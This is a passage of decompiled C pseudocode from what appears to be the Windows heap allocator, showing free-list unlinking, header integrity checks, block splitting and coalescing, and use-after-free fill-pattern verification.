																	_t1452 = _v108 - (_t1450 & 0x0000ffff);
																	__eflags = _t1452;
																	_v292 = _t1452;
																	if(_t1452 != 0) {
																		_t1441 = _v92;
																		goto L176;
																	} else {
																		_t315 = _t1611 + 0x20; // 0xffffffe4
																		 *(_v80 +  *_t315) = _t1822;
																		_t1441 = _v92;
																	}
																}
															}
														}
													}
													L172:
													_t1327 = _v128;
													_t1612 = _v144;
													 *_t1612 = _t1327;
													 *(_t1327 + 4) = _t1612;
													__eflags =  *(_t1441 + 2) & 0x00000008;
													if(( *(_t1441 + 2) & 0x00000008) == 0) {
														L182:
														_v58 = 1;
														goto L200;
													} else {
														_t1328 = E1D7CF5C7(_t1771, _t1441);
														__eflags = _t1328;
														if(_t1328 != 0) {
															goto L182;
														} else {
															E1D7CF113(_t1771, _t1441,  *_t1441 & 0x0000ffff, 1);
															_v58 = 0;
														}
													}
												}
											}
										}
									}
									goto L517;
								}
								_v176 = _t1662;
								_t1053 = _t1662;
								goto L101;
							} else {
								_t1826 =  *_t1793;
								__eflags = _t1826;
								if(_t1826 == 0) {
									goto L95;
								} else {
									_t1441 = _t1826 - 8;
									_v92 = _t1441;
									__eflags =  *(_t1771 + 0x4c);
									if( *(_t1771 + 0x4c) != 0) {
										 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
										__eflags =  *(_t1441 + 3) - ( *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441);
										if(__eflags != 0) {
											_push(_t1464);
											E1D88D646(_t1441, _t1771, _t1441, _t1771, _t1826, __eflags);
										}
									}
									_t1635 =  *(_t1441 + 8);
									_v48 = _t1635;
									_t1378 =  *(_t1441 + 0xc);
									_v32 = _t1378;
									_t1379 =  *_t1378;
									_t1636 =  *((intOrPtr*)(_t1635 + 4));
									__eflags = _t1379 - _t1636;
									if(_t1379 != _t1636) {
										L93:
										E1D895FED(0xd, _t1771, _t1826, _t1636, _t1379, 0);
										goto L94;
									} else {
										__eflags = _t1379 - _t1826;
										if(_t1379 != _t1826) {
											goto L93;
										} else {
											 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1441 & 0x0000ffff);
											_t1757 =  *(_t1771 + 0xb4);
											_v44 = _t1757;
											__eflags = _t1757;
											if(_t1757 != 0) {
												_t1828 =  *_t1441 & 0x0000ffff;
												_v72 = _t1828;
												while(1) {
													_t1641 =  *(_t1757 + 4);
													__eflags = _t1828 - _t1641;
													if(_t1828 < _t1641) {
														break;
													}
													_t1406 =  *_t1757;
													__eflags = _t1406;
													if(_t1406 != 0) {
														_t1757 = _t1406;
														_v44 = _t1757;
														continue;
													} else {
														_t1828 = _t1641 - 1;
														_v72 = _t1828;
													}
													break;
												}
												_v192 = _t1828;
												_v128 =  *_t1441 & 0x0000ffff;
												_t1643 = _t1828 -  *((intOrPtr*)(_t1757 + 0x14));
												_v108 = _t1643;
												__eflags =  *(_t1757 + 8);
												_t1389 = _t1643 + _t1643;
												if( *(_t1757 + 8) == 0) {
													_t1389 = _t1643;
												}
												_t1777 = _t1389 * 4;
												_v80 = _t1777;
												_t1391 =  *((intOrPtr*)(_t1757 + 0x20)) + _t1777;
												_v96 = _t1391;
												_v36 =  *_t1391;
												 *((intOrPtr*)(_t1757 + 0xc)) =  *((intOrPtr*)(_t1757 + 0xc)) - 1;
												_t1393 =  *(_t1757 + 4);
												_t1778 = _t1393 - 1;
												_v144 = _t1778;
												__eflags = _t1828 - _t1778;
												_t1771 = _v124;
												if(_t1828 == _t1778) {
													_t131 = _t1757 + 0x10;
													 *_t131 =  *(_t1757 + 0x10) - 1;
													__eflags =  *_t131;
												}
												_t133 = _t1441 + 8; // 0xddeeddf6
												_t1829 = _t133;
												__eflags = _v36 - _t1829;
												if(_v36 == _t1829) {
													_v196 = _t1393;
													__eflags =  *_t1757;
													if( *_t1757 == 0) {
														_t1393 = _v144;
														_v196 = _t1393;
													}
													_t1830 =  *_t1829;
													_v144 =  *(_t1757 + 0x18);
													__eflags = _v72 - _t1393;
													_t1771 = _v124;
													if(_v72 >= _t1393) {
														_t1394 = _v96;
														__eflags = _t1830 - _v144;
														if(_t1830 == _v144) {
															 *_t1394 = 0;
															goto L87;
														} else {
															 *_t1394 = _t1830;
															goto L82;
														}
														goto L525;
													} else {
														__eflags = _t1830 -  *(_t1757 + 0x18);
														if(_t1830 ==  *(_t1757 + 0x18)) {
															L86:
															 *(_v80 +  *((intOrPtr*)(_t1757 + 0x20))) = 0;
															L87:
															_t168 = _v44 + 0x1c; // 0x0
															 *( *_t168 + (_t1643 >> 5) * 4) =  *( *_t168 + (_t1643 >> 5) * 4) &  !(1 << (_t1643 & 0x0000001f));
														} else {
															_t1455 =  *(_t1830 - 8);
															_v340 = _t1455;
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1455 = _t1455 ^  *(_t1771 + 0x50);
																_v340 = _t1455;
																__eflags = _t1455 >> 0x18 - (_t1455 >> 0x00000010 ^ _t1455 >> 0x00000008 ^ _t1455);
																if(_t1455 >> 0x18 != (_t1455 >> 0x00000010 ^ _t1455 >> 0x00000008 ^ _t1455)) {
																	E1D895FED(3, _t1771, _t1830 - 8, 0, 0, 0);
																	_t1757 = _v44;
																}
															}
															_t1646 = _v128 - (_t1455 & 0x0000ffff);
															__eflags = _t1646;
															_v268 = _t1646;
															if(_t1646 != 0) {
																_t1441 = _v92;
																_t1643 = _v108;
																goto L86;
															} else {
																_t152 = _t1757 + 0x20; // 0xffffffe4
																 *(_v80 +  *_t152) = _t1830;
																_t1441 = _v92;
															}
														}
													}
												}
											}
											L82:
											_t1384 = _v48;
											_t1638 = _v32;
											 *_t1638 = _t1384;
											 *(_t1384 + 4) = _t1638;
											__eflags =  *(_t1441 + 2) & 0x00000008;
											if(( *(_t1441 + 2) & 0x00000008) == 0) {
												L92:
												_v57 = 1;
												L200:
												_t1499 =  *(_t1441 + 2);
												_v59 = _t1499;
												_t1796 = _v116;
												__eflags = _t1796;
												if(_t1796 == 0) {
													__eflags = _t1499 & 0x00000004;
													if((_t1499 & 0x00000004) != 0) {
														_t1818 = ( *_t1441 & 0x0000ffff) * 8 - 0x10;
														_v220 = _t1818;
														__eflags = _t1499 & 0x00000002;
														if((_t1499 & 0x00000002) != 0) {
															__eflags = _t1818 - 4;
															if(_t1818 > 4) {
																_t1818 = _t1818 - 4;
																__eflags = _t1818;
																_v220 = _t1818;
															}
														}
														_t380 = _t1441 + 0x10; // 0x10
														_t1306 = E1D8280A0(_t380, _t1818, 0xfeeefeee);
														_v32 = _t1306;
														__eflags = _t1306 - _t1818;
														if(_t1306 != _t1818) {
															_t1599 =  *[fs:0x30];
															__eflags =  *(_t1599 + 0xc);
															if( *(_t1599 + 0xc) == 0) {
																_push("HEAP: ");
																E1D7CB910();
																_t1843 = _t1839 + 4;
															} else {
																E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																_t1843 = _t1839 + 8;
															}
															_push(_v32 + 0x10 + _v92);
															E1D7CB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _v92);
															_t1839 = _t1843 + 0xc;
															_t1312 =  *[fs:0x30];
															__eflags =  *((char*)(_t1312 + 2));
															if( *((char*)(_t1312 + 2)) == 0) {
																_t1441 = _v92;
															} else {
																 *0x1d8c47a1 = 1;
																_t1441 = _v92;
																 *0x1d8c4100 = _t1441;
																asm("int3");
																 *0x1d8c47a1 = 0;
															}
														}
														_t1796 = _v116;
													}
												}
												_v104 = _t1441;
												__eflags =  *(_t1441 + 2) & 0x00000001;
												if(( *(_t1441 + 2) & 0x00000001) == 0) {
													 *(_t1441 + 2) = _v56;
													_t1500 = _v40;
													_t1679 = ( *_t1441 & 0x0000ffff) - _t1500;
													_v80 = _t1679;
													_v296 = _t1679;
													_t1081 = _t1500 & 0x0000ffff;
													_v32 = _t1081;
													 *_t1441 = _t1081;
													_t1083 = _a8 - _a4;
													_v108 = _t1083;
													__eflags = _t1083 - 0x3f;
													if(_t1083 >= 0x3f) {
														 *(_t1441 + _t1500 * 8 - 4) = _t1083;
														 *(_t1441 + 7) = 0x3f;
													} else {
														 *(_t1441 + 7) = _t1083;
													}
													 *(_t1441 + 3) = 0;
													__eflags = _t1679;
													if(_t1679 == 0) {
														L222:
														_t1501 = _v104;
														_t1797 =  &(_t1501[4]);
														_v88 = _t1797;
														_t1680 = ( *_t1501 & 0x0000ffff) * 8;
														_v140 = _t1680;
														_t1085 =  &(_t1501[3]);
														_v32 = _t1085;
														__eflags = ( *_t1085 & 0x0000003f) - 0x3f;
														if(( *_t1085 & 0x0000003f) == 0x3f) {
															_t1680 = _t1680 + 0xfffffffc;
															__eflags = _t1680;
															_v140 = _t1680;
														}
														__eflags = _v116;
														if(_v116 == 0) {
															__eflags = _v120 & 0x00000008;
															if((_v120 & 0x00000008) == 0) {
																__eflags =  *(_t1771 + 0x40) & 0x00000040;
																if(( *(_t1771 + 0x40) & 0x00000040) == 0) {
																	goto L455;
																} else {
																	_t1449 = _a4;
																	E1D828140(_v88, _t1449 & 0xfffffffc, 0xbaadf00d);
																	goto L456;
																}
																goto L517;
															} else {
																E1D818F40(_t1797, 0, _t1680 - 8);
																L455:
																_t1449 = _a4;
															}
															L456:
															__eflags =  *(_t1771 + 0x40) & 0x00000020;
															if(( *(_t1771 + 0x40) & 0x00000020) != 0) {
																 *((intOrPtr*)(_t1797 + _t1449)) = 0xabababab;
																 *((intOrPtr*)(_t1797 + _t1449 + 4)) = 0xabababab;
																_t1108 = _v104;
																_t845 = _t1108 + 2;
																 *_t845 =  *(_t1108 + 2) | 0x00000004;
																__eflags =  *_t845;
															}
															_t1502 = _v104;
															_t1441 = _t1502 + 3;
															 *_t1441 = 0;
															_t1088 = _t1502 + 2;
															_v48 = _t1088;
															__eflags =  *_t1088 & 0x00000002;
															if(( *_t1088 & 0x00000002) == 0) {
																_t1090 =  *( *[fs:0x30] + 0x68);
																_v324 = _t1090;
																__eflags = _t1090 & 0x00000800;
																if((_t1090 & 0x00000800) == 0) {
																	goto L470;
																} else {
																	_t1798 = _v104;
																	 *_t1441 = E1D879AFE(_t1771, _v120 >> 0x00000012 & 0x000000ff, 0,  *_t1798 & 0x0000ffff, 0);
																}
															} else {
																__eflags =  *_v32 - 4;
																if( *_v32 != 4) {
																	_t1505 = _v104;
																	_t1101 = ( *_t1505 & 0x0000ffff) - 1;
																	__eflags = _t1101;
																	_t1799 = _t1505 + _t1101 * 8;
																} else {
																	_t1799 = _t1502 - 0x10;
																}
																_t1102 = _t1799;
																_v172 = _t1799;
																 *_t1102 = 0;
																 *((intOrPtr*)(_t1102 + 4)) = 0;
																__eflags =  *(_t1771 + 0x40) & 0x08000000;
																if(( *(_t1771 + 0x40) & 0x08000000) != 0) {
																	 *_t1799 = E1D7FFDB9(1, _t1680);
																}
																_t1104 =  *( *[fs:0x30] + 0x68);
																_v320 = _t1104;
																__eflags = _t1104 & 0x00000800;
																if((_t1104 & 0x00000800) == 0) {
																	L470:
																	_t1798 = _v104;
																} else {
																	_t1798 = _v104;
																	 *((short*)(_v172 + 2)) = E1D879AFE(_t1771, _v120 >> 0x00000012 & 0x00000fff, 0,  *_t1798 & 0x0000ffff, 0);
																}
															}
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																 *_t1441 = _t1798[0] ^  *_v48 ^  *_t1798;
																 *_t1798 =  *_t1798 ^  *(_t1771 + 0x50);
															}
														} else {
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1518 = _v104;
																_t1518[0] = _t1518[0] ^ _t1518[0] ^  *_t1518;
																 *_t1518 =  *_t1518 ^  *(_t1771 + 0x50);
																__eflags =  *_t1518;
															}
															__eflags = _v49;
															if(_v49 != 0) {
																__eflags =  *(_t1771 + 0x44) & 0x01000000;
																if(( *(_t1771 + 0x44) & 0x01000000) == 0) {
																	 *(_t1771 + 0x22c) =  *(_t1771 + 0x22c) + 1;
																	_t1680 =  *(_t1771 + 0x234);
																	__eflags =  *(_t1771 + 0x22c) - _t1680;
																	if( *(_t1771 + 0x22c) > _t1680) {
																		 *(_t1771 + 0x22c) = 0;
																		_t1517 =  *((intOrPtr*)(_t1771 + 0x1f8)) - ( *(_t1771 + 0x74) << 3);
																		__eflags = _t1517 -  *((intOrPtr*)(_t1771 + 0x248));
																		if(_t1517 >  *((intOrPtr*)(_t1771 + 0x248))) {
																			 *((intOrPtr*)(_t1771 + 0x248)) = _t1517;
																		}
																		 *((intOrPtr*)(_t1771 + 0x24c)) = _t1517;
																	}
																	 *(_t1771 + 0x238) =  *(_t1771 + 0x238) + 1;
																	__eflags =  *(_t1771 + 0x238) - 0x1000;
																	if( *(_t1771 + 0x238) >= 0x1000) {
																		__eflags =  *((char*)(_t1771 + 0xea)) - 2;
																		if( *((char*)(_t1771 + 0xea)) != 2) {
																			L236:
																			_t1125 = 0x10;
																		} else {
																			__eflags =  *((intOrPtr*)(_t1771 + 0x23c)) - 0x10;
																			_t1125 = 0x100;
																			if( *((intOrPtr*)(_t1771 + 0x23c)) <= 0x10) {
																				goto L236;
																			}
																		}
																		__eflags =  *(_t1771 + 0x230) - _t1125;
																		if( *(_t1771 + 0x230) > _t1125) {
																			__eflags = _t1680 - 0x10000;
																			if(_t1680 < 0x10000) {
																				 *(_t1771 + 0x234) = _t1680 + _t1680;
																			}
																		}
																		 *(_t1771 + 0x230) = 0;
																		 *(_t1771 + 0x238) = 0;
																	}
																}
																_t1800 =  *((intOrPtr*)(_t1771 + 0xc8));
																_t452 = _t1800 + 8;
																 *_t452 =  *(_t1800 + 8) + 0xffffffff;
																__eflags =  *_t452;
																if( *_t452 == 0) {
																	 *(_t1800 + 0xc) = 0;
																	_t1510 = _t1800 + 4;
																	asm("lock cmpxchg [ecx], edx");
																	_t1441 = 0xfffffffe;
																	__eflags = 0xfffffffe - 0xfffffffe;
																	if(0xfffffffe != 0xfffffffe) {
																		__eflags =  *_t1510 & 0x00000001;
																		if(( *_t1510 & 0x00000001) != 0) {
																			E1D86AA40(_t1800);
																		}
																		_t1118 =  *(_t1800 + 0x10);
																		_v72 = _t1118;
																		__eflags = _t1118;
																		if(_t1118 == 0) {
																			_v72 = E1D7FFEC0(_t1800);
																		}
																		_v252 = 0;
																		while(1) {
																			_t1513 = _t1441 & 0x00000002 | 0x00000001;
																			asm("lock cmpxchg [edi], edx");
																			__eflags = _t1441 - _t1441;
																			_t1771 = _v124;
																			if(_t1441 == _t1441) {
																				break;
																			}
																			E1D7FBAC0(_t1513,  &_v252);
																			_t1441 =  *(_t1800 + 4);
																		}
																		__eflags = _t1513 & 0x00000002;
																		if((_t1513 & 0x00000002) != 0) {
																			E1D7FF300(_t1800, _v72);
																		}
																	}
																}
																_v49 = 0;
															}
															__eflags = _v120 & 0x00000008;
															if((_v120 & 0x00000008) != 0) {
																E1D818F40(_v88, 0, _v140 + 0xfffffff8);
															}
														}
													} else {
														__eflags = _t1679 - 1;
														if(_t1679 != 1) {
															__eflags = _t1796;
															_t1134 = 0 | _t1796 == 0x00000000;
															_v44 = _t1134;
															_v184 = _t1134;
															_t1135 =  *(_t1441 + 6);
															__eflags = _t1135;
															if(_t1135 == 0) {
																_t1519 = _t1771;
																_t1801 = _t1771;
															} else {
																_t1519 = (1 - (_t1135 & 0x000000ff) << 0x10) + (_t1441 & 0xffff0000);
																_t1801 = 1;
															}
															_v224 = _t1519;
															_v48 = _t1679;
															_t1441 = _t1441 + _v40 * 8;
															_v72 = 0;
															 *(_t1441 + 2) = _v59;
															 *(_t1441 + 7) = 0;
															 *(_t1441 + 4) =  *(_t1771 + 0x54) ^ _v32;
															__eflags =  *((intOrPtr*)(_t1519 + 0x18)) - _t1801;
															if( *((intOrPtr*)(_t1519 + 0x18)) != _t1801) {
																_t1143 = (_t1441 - _t1801 >> 0x10) + 1;
																_v32 = _t1143;
																_v128 = _t1143;
																__eflags = _t1143 - 0xfe;
																if(_t1143 >= 0xfe) {
																	E1D895FED(3,  *((intOrPtr*)(_t1519 + 0x18)), _t1441, _t1519, 0, 0);
																	_t1679 = _v80;
																	_t1143 = _v32;
																}
															} else {
																_t1143 = 0;
															}
															_v110 = _t1143;
															 *(_t1441 + 6) = _t1143;
															 *(_t1441 + 3) = 0;
															 *_t1441 = _t1679;
															while(1) {
																_t1802 = _t1441 + _t1679 * 8;
																_t1520 =  *(_t1771 + 0x4c);
																_t1147 = _t1520 >> 0x00000014 &  *(_t1771 + 0x52) ^ _t1802[1];
																__eflags = _t1147 & 0x00000001;
																if((_t1147 & 0x00000001) != 0) {
																	break;
																}
																__eflags = _t1520;
																if(_t1520 != 0) {
																	_t1705 =  *(_t1771 + 0x50) ^  *_t1802;
																	 *_t1802 = _t1705;
																	_t1548 = _t1705 >> 0x00000010 ^ _t1705 >> 0x00000008 ^ _t1705;
																	__eflags = _t1705 >> 0x18 - _t1548;
																	if(__eflags != 0) {
																		_push(_t1548);
																		E1D88D646(_t1441, _t1771, _t1802, _t1771, _t1802, __eflags);
																	}
																}
																_t1688 =  &(_t1802[4]);
																_t1521 =  *_t1688;
																_v32 = _t1521;
																_t1148 = _t1802[6];
																_v48 = _t1148;
																_t1149 =  *_t1148;
																_t1522 =  *((intOrPtr*)(_t1521 + 4));
																__eflags = _t1149 - _t1522;
																if(_t1149 != _t1522) {
																	L448:
																	E1D895FED(0xd, _t1771, _t1688, _t1522, _t1149, 0);
																	goto L449;
																} else {
																	__eflags = _t1149 - _t1688;
																	if(_t1149 != _t1688) {
																		goto L448;
																	} else {
																		 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1802 & 0x0000ffff);
																		_t1690 =  *(_t1771 + 0xb4);
																		__eflags = _t1690;
																		if(_t1690 != 0) {
																			while(1) {
																				_t1205 =  *_t1802 & 0x0000ffff;
																				_t1542 =  *((intOrPtr*)(_t1690 + 4));
																				__eflags = _t1205 - _t1542;
																				if(_t1205 < _t1542) {
																					break;
																				}
																				_t1208 =  *_t1690;
																				__eflags = _t1208;
																				if(_t1208 != 0) {
																					_t1690 = _t1208;
																					continue;
																				} else {
																					_t1205 = _t1542 - 1;
																				}
																				break;
																			}
																			_v240 = _t1205;
																			E1D7E036A(_t1771, _t1690, 1,  &(_t1802[4]), _t1205,  *_t1802 & 0x0000ffff);
																		}
																		_t1154 = _v32;
																		_t1524 = _v48;
																		 *_t1524 = _t1154;
																		 *(_t1154 + 4) = _t1524;
																		__eflags = _t1802[1] & 0x00000008;
																		if((_t1802[1] & 0x00000008) == 0) {
																			L388:
																			_v60 = 1;
																			__eflags = _v44;
																			if(_v44 != 0) {
																				_t1536 = _t1802[1];
																				__eflags = _t1536 & 0x00000004;
																				if((_t1536 & 0x00000004) != 0) {
																					_t1189 = ( *_t1802 & 0x0000ffff) * 8 - 0x10;
																					_v168 = _t1189;
																					__eflags = _t1536 & 0x00000002;
																					if((_t1536 & 0x00000002) != 0) {
																						__eflags = _t1189 - 4;
																						if(_t1189 > 4) {
																							_t1189 = _t1189 - 4;
																							__eflags = _t1189;
																							_v168 = _t1189;
																						}
																					}
																					_t1191 = E1D8280A0( &(_t1802[8]), _t1189, 0xfeeefeee);
																					_v32 = _t1191;
																					__eflags = _t1191 - _v168;
																					if(_t1191 != _v168) {
																						_t1537 =  *[fs:0x30];
																						__eflags =  *(_t1537 + 0xc);
																						if( *(_t1537 + 0xc) == 0) {
																							_push("HEAP: ");
																							E1D7CB910();
																							_t1842 = _t1839 + 4;
																						} else {
																							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																							_t1842 = _t1839 + 8;
																						}
																						_push(_v32 + 0x10 + _t1802);
																						E1D7CB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1802);
																						_t1839 = _t1842 + 0xc;
																						_t1197 =  *[fs:0x30];
																						__eflags =  *((char*)(_t1197 + 2));
																						if( *((char*)(_t1197 + 2)) != 0) {
																							 *0x1d8c47a1 = 1;
																							 *0x1d8c4100 = _t1802;
																							asm("int3");
																							 *0x1d8c47a1 = 0;
																						}
																						_v44 = _v184;
																					}
																				}
																			}
																			 *(_t1441 + 2) = _t1802[1];
																			_t1526 = _v80 + ( *_t1802 & 0x0000ffff);
																			_v48 = _t1526;
																			_t1157 = _t1526 & 0x0000ffff;
																			_t1691 = _t1526 & 0x0000ffff;
																			__eflags = _t1526 - 0xfe00;
																			if(_t1526 > 0xfe00) {
																				E1D7E0B10(_t1771, _t1441, _t1526);
																			} else {
																				 *_t1441 = _t1526;
																				_t1804 = _t1157;
																				 *(_t1441 + 4 + _t1526 * 8) =  *(_t1771 + 0x54) ^ _t1691;
																				__eflags = _v44;
																				if(_v44 != 0) {
																					 *(_t1441 + 2) =  *(_t1441 + 2) & 0x000000f0;
																					 *(_t1441 + 7) = 0;
																					__eflags =  *(_t1771 + 0x40) & 0x00000040;
																					if(( *(_t1771 + 0x40) & 0x00000040) != 0) {
																						_t793 = _t1441 + 0x10; // 0x10
																						E1D828140(_t793, _t1804 * 8 - 0x10, 0xfeeefeee);
																						_t794 = _t1441 + 2;
																						 *_t794 =  *(_t1441 + 2) | 0x00000004;
																						__eflags =  *_t794;
																					}
																					_t1163 = _t1771 + 0xc0;
																					__eflags =  *(_t1771 + 0xb4);
																					if( *(_t1771 + 0xb4) == 0) {
																						_t1528 =  *_t1163;
																					} else {
																						_t1528 = E1D7D1C0E(_t1771, _t1804);
																						_t1163 = _t1771 + 0xc0;
																					}
																					while(1) {
																						__eflags = _t1163 - _t1528;
																						if(_t1163 == _t1528) {
																							break;
																						}
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) == 0) {
																							_t1696 =  *(_t1528 - 8);
																						} else {
																							_t1696 =  *(_t1528 - 8);
																							_v100 = _t1696;
																							__eflags =  *(_t1771 + 0x4c) & _t1696;
																							if(( *(_t1771 + 0x4c) & _t1696) != 0) {
																								_t1696 = _t1696 ^  *(_t1771 + 0x50);
																								_v100 = _t1696;
																							}
																						}
																						_v130 = _t1696;
																						__eflags = _t1804 - (_t1696 & 0x0000ffff);
																						if(_t1804 > (_t1696 & 0x0000ffff)) {
																							_t1528 =  *_t1528;
																							_t1163 = _t1771 + 0xc0;
																							continue;
																						}
																						break;
																					}
																					_t810 = _t1441 + 8; // 0x8
																					_t1805 = _t810;
																					_t1164 =  *((intOrPtr*)(_t1528 + 4));
																					_t1693 =  *_t1164;
																					__eflags = _t1693 - _t1528;
																					if(_t1693 != _t1528) {
																						__eflags = 0;
																						E1D895FED(0xd, 0, _t1528, 0, _t1693, 0);
																					} else {
																						 *_t1805 = _t1528;
																						 *((intOrPtr*)(_t1805 + 4)) = _t1164;
																						 *_t1164 = _t1805;
																						 *((intOrPtr*)(_t1528 + 4)) = _t1805;
																					}
																					 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																					_t1695 =  *(_t1771 + 0xb4);
																					__eflags = _t1695;
																					if(_t1695 == 0) {
																						goto L371;
																					} else {
																						_t1530 =  *_t1441 & 0x0000ffff;
																						while(1) {
																							__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
																							if(_t1530 <  *((intOrPtr*)(_t1695 + 4))) {
																								break;
																							}
																							_t1171 =  *_t1695;
																							__eflags = _t1171;
																							if(_t1171 != 0) {
																								_t1695 = _t1171;
																								continue;
																							} else {
																								_t1172 =  *((intOrPtr*)(_t1695 + 4)) - 1;
																								__eflags = _t1172;
																							}
																							L444:
																							_v248 = _t1172;
																							goto L370;
																						}
																						_t1172 = _t1530;
																						goto L444;
																					}
																				} else {
																					 *(_t1441 + 2) = 0;
																					 *(_t1441 + 7) = 0;
																					_t1180 = _t1771 + 0xc0;
																					__eflags =  *(_t1771 + 0xb4);
																					if( *(_t1771 + 0xb4) == 0) {
																						_t1533 =  *_t1180;
																					} else {
																						_t1533 = E1D7D1C0E(_t1771, _t1804);
																						_t1180 = _t1771 + 0xc0;
																					}
																					while(1) {
																						__eflags = _t1180 - _t1533;
																						if(_t1180 == _t1533) {
																							break;
																						}
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) == 0) {
																							_t1700 =  *(_t1533 - 8);
																						} else {
																							_t1700 =  *(_t1533 - 8);
																							_v84 = _t1700;
																							__eflags =  *(_t1771 + 0x4c) & _t1700;
																							if(( *(_t1771 + 0x4c) & _t1700) != 0) {
																								_t1700 = _t1700 ^  *(_t1771 + 0x50);
																								_v84 = _t1700;
																							}
																						}
																						_v132 = _t1700;
																						__eflags = _t1804 - (_t1700 & 0x0000ffff);
																						if(_t1804 > (_t1700 & 0x0000ffff)) {
																							_t1533 =  *_t1533;
																							_t1180 = _t1771 + 0xc0;
																							continue;
																						}
																						break;
																					}
																					_t774 = _t1441 + 8; // 0x8
																					_t1805 = _t774;
																					_t1181 =  *((intOrPtr*)(_t1533 + 4));
																					_t1698 =  *_t1181;
																					__eflags = _t1698 - _t1533;
																					if(_t1698 != _t1533) {
																						__eflags = 0;
																						E1D895FED(0xd, 0, _t1533, 0, _t1698, 0);
																					} else {
																						 *_t1805 = _t1533;
																						 *((intOrPtr*)(_t1805 + 4)) = _t1181;
																						 *_t1181 = _t1805;
																						 *((intOrPtr*)(_t1533 + 4)) = _t1805;
																					}
																					 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																					_t1695 =  *(_t1771 + 0xb4);
																					__eflags = _t1695;
																					if(_t1695 == 0) {
																						L371:
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) != 0) {
																							 *(_t1441 + 3) =  *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441;
																							 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
																						}
																						goto L447;
																					} else {
																						_t1530 =  *_t1441 & 0x0000ffff;
																						while(1) {
																							__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
																							if(_t1530 <  *((intOrPtr*)(_t1695 + 4))) {
																								break;
																							}
																							_t1184 =  *_t1695;
																							__eflags = _t1184;
																							if(_t1184 != 0) {
																								_t1695 = _t1184;
																								continue;
																							} else {
																								_t1172 =  *((intOrPtr*)(_t1695 + 4)) - 1;
																								__eflags = _t1172;
																							}
																							L421:
																							_v244 = _t1172;
																							L370:
																							E1D7D1B5D(_t1771, _t1695, 1, _t1805, _t1172, _t1530);
																							goto L371;
																						}
																						_t1172 = _t1530;
																						goto L421;
																					}
																				}
																				goto L525;
																			}
																			L447:
																			_v109 = 1;
																			_v59 = 0;
																			goto L222;
																		} else {
																			_t1202 = E1D7CF5C7(_t1771, _t1802);
																			__eflags = _t1202;
																			if(_t1202 != 0) {
																				goto L388;
																			} else {
																				E1D7CF113(_t1771, _t1802,  *_t1802 & 0x0000ffff, 1);
																				L449:
																				_v60 = 0;
																				__eflags = _v72;
																				if(_v72 != 0) {
																					_v109 = 0;
																					 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000003c;
																					_t1803 =  *[fs:0x18];
																					_v316 = _t1803;
																					 *((intOrPtr*)(_t1803 + 0x34)) = E1D7FABA0(0xc000003c);
																				} else {
																					_v72 = 1;
																					_t1679 = _v80;
																					continue;
																				}
																			}
																		}
																	}
																}
																goto L517;
															}
															_t1708 = _t1679 & 0x0000ffff;
															_v40 = _t1708;
															_t1802[2] =  *(_t1771 + 0x54) ^ _t1708;
															__eflags = _v44;
															if(_v44 != 0) {
																 *(_t1441 + 2) =  *(_t1441 + 2) & 0x000000f0;
																 *(_t1441 + 7) = 0;
																__eflags =  *(_t1771 + 0x40) & 0x00000040;
																if(( *(_t1771 + 0x40) & 0x00000040) != 0) {
																	_t676 = _t1441 + 0x10; // 0x10
																	E1D828140(_t676, _t1708 * 8 - 0x10, 0xfeeefeee);
																	_t677 = _t1441 + 2;
																	 *_t677 =  *(_t1441 + 2) | 0x00000004;
																	__eflags =  *_t677;
																	_t1708 = _v40;
																}
																_t1806 = _t1771 + 0xc0;
																__eflags =  *(_t1771 + 0xb4);
																if( *(_t1771 + 0xb4) == 0) {
																	_t1550 =  *_t1806;
																} else {
																	_t1550 = E1D7D1C0E(_t1771, _t1708);
																}
																while(1) {
																	__eflags = _t1806 - _t1550;
																	if(_t1806 == _t1550) {
																		break;
																	}
																	__eflags =  *(_t1771 + 0x4c);
																	if( *(_t1771 + 0x4c) == 0) {
																		_t1711 =  *(_t1550 - 8);
																	} else {
																		_t1711 =  *(_t1550 - 8);
																		_v76 = _t1711;
																		__eflags =  *(_t1771 + 0x4c) & _t1711;
																		if(( *(_t1771 + 0x4c) & _t1711) != 0) {
																			_t1711 = _t1711 ^  *(_t1771 + 0x50);
																			_v76 = _t1711;
																		}
																	}
																	_v134 = _t1711;
																	__eflags = _v40 - (_t1711 & 0x0000ffff);
																	if(_v40 > (_t1711 & 0x0000ffff)) {
																		_t1550 =  *_t1550;
																		continue;
																	}
																	break;
																}
																_t693 = _t1441 + 8; // 0x8
																_t1805 = _t693;
																_t1216 =  *((intOrPtr*)(_t1550 + 4));
																_t1709 =  *_t1216;
																__eflags = _t1709 - _t1550;
																if(_t1709 != _t1550) {
																	__eflags = 0;
																	E1D895FED(0xd, 0, _t1550, 0, _t1709, 0);
																} else {
																	 *_t1805 = _t1550;
																	 *((intOrPtr*)(_t1805 + 4)) = _t1216;
																	 *_t1216 = _t1805;
																	 *((intOrPtr*)(_t1550 + 4)) = _t1805;
																}
																 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
